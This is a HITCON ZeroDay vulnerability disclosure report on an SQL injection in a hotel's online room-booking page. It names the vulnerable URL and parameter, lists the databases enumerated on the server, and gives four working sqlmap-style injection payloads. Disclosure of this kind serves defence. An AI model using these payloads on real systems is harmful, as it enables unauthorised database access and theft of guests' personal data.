友統大飯店某飯店資料庫注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00251
  • Vendor: 友統大飯店
  • Title: 友統大飯店某飯店資料庫注入漏洞
  • Introduction: SQLi

處理狀態

目前狀態

公開
Last Update : 2016/12/07
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2016/10/05 20:32:49 : 新提交 (由 baton 更新此狀態)
  • 2016/10/05 20:32:51 : 新提交 (由 HITCON ZeroDay 平台自動更新)
  • 2016/10/06 19:06:37 : 審核完成 (由 HITCON ZeroDay 平台自動更新)
  • 2016/10/11 16:37:03 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/10/11 16:37:07 : 修補中 (由 HITCON ZeroDay 平台自動更新)
  • 2016/12/07 01:00:09 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00251
  • 通報者:baton (baton)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://yotong.ffh.com.tw/orderonline/html/room/room_content.php?id=&show=0

敘述

available databases [18]:
[] harvest
[
] information_schema
[] lycidc
[
] lycidc_ftp
[] mysql
[
] opussugarcrm
[] phpmyadmin
[
] sbdc
[] sbdcdata
[
] sees
[] sinohitech
[
] test
[] www2_sbdc
[
] yolai
[] yotong
[
] yotong1
[] yoxing
[
] yoyo


Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-5850 OR 4375=4375&show=0

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=-2338 OR 1 GROUP BY CONCAT(0x7170787671,(SELECT (CASE WHEN (8045=8045) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&show=0

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: id=(CASE WHEN (9702=9702) THEN SLEEP(5) ELSE 9702 END)&show=0

Type: UNION query
Title: Generic UNION query (random number) - 19 columns
Payload: id=-9136 UNION ALL SELECT 8598,8598,8598,CONCAT(0x7170787671,0x4f56486a79445a4b485375784843787358755a4e4a6b5544656b61524c676767795970695153777a,0x716b766271),8598,8598,8598,8598,8598,8598,8598,8598,8598,8598,8598,8598,8598,8598,8598-- anTP&show=0

留言討論

;